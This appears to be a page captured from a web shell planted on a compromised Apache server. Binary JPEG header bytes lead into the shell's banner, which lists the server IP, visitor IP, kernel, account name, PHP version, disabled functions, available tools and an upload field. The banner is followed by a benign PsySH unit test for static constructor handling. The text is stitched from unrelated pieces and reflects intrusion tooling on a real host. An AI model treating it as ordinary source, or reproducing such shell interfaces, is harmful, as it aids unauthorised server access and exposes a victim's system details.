ÿØÿà JFIF H H ÿÛ C ÿÛ Cÿ " ÿÄ ÿÄ ÿÚ ±5¬€ ÿÄ àÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÄ àÿÚ ?! ÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÙ
| Server IP : 160.25.81.117 / Your IP : 216.73.216.137 Web Server : Apache/2 System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : bellizen ( 1045) PHP Version : 7.2.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/bellizen/public_html/vendor/psy/psysh/test/Psy/Test/CodeCleaner/ |
Upload File : |
<?php
/*
* This file is part of Psy Shell.
*
* (c) 2012-2017 Justin Hileman
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Psy\Test\CodeCleaner;
use Psy\CodeCleaner\StaticConstructorPass;
class StaticConstructorPassTest extends CodeCleanerTestCase
{
protected function setUp()
{
$this->setPass(new StaticConstructorPass());
}
/**
* @dataProvider invalidStatements
* @expectedException \Psy\Exception\FatalErrorException
*/
public function testProcessInvalidStatement($code)
{
$stmts = $this->parse($code);
$this->traverser->traverse($stmts);
}
/**
* @dataProvider invalidParserStatements
* @expectedException \Psy\Exception\ParseErrorException
*/
public function testProcessInvalidStatementCatchedByParser($code)
{
$stmts = $this->parse($code);
$this->traverser->traverse($stmts);
}
public function invalidStatements()
{
$statements = array(
array('class A { public static function A() {}}'),
array('class A { private static function A() {}}'),
);
if (version_compare(PHP_VERSION, '5.3.3', '<')) {
$statements[] = array('namespace B; class A { private static function A() {}}');
}
return $statements;
}
public function invalidParserStatements()
{
$statements = array(
array('class A { public static function __construct() {}}'),
array('class A { private static function __construct() {}}'),
array('class A { private static function __construct() {} public function A() {}}'),
array('namespace B; class A { private static function __construct() {}}'),
);
return $statements;
}
/**
* @dataProvider validStatements
*/
public function testProcessValidStatement($code)
{
$stmts = $this->parse($code);
$this->traverser->traverse($stmts);
}
public function validStatements()
{
$statements = array(
array('class A { public static function A() {} public function __construct() {}}'),
array('class A { private function __construct() {} public static function A() {}}'),
);
if (version_compare(PHP_VERSION, '5.3.3', '>=')) {
$statements[] = array('namespace B; class A { private static function A() {}}');
}
return $statements;
}
}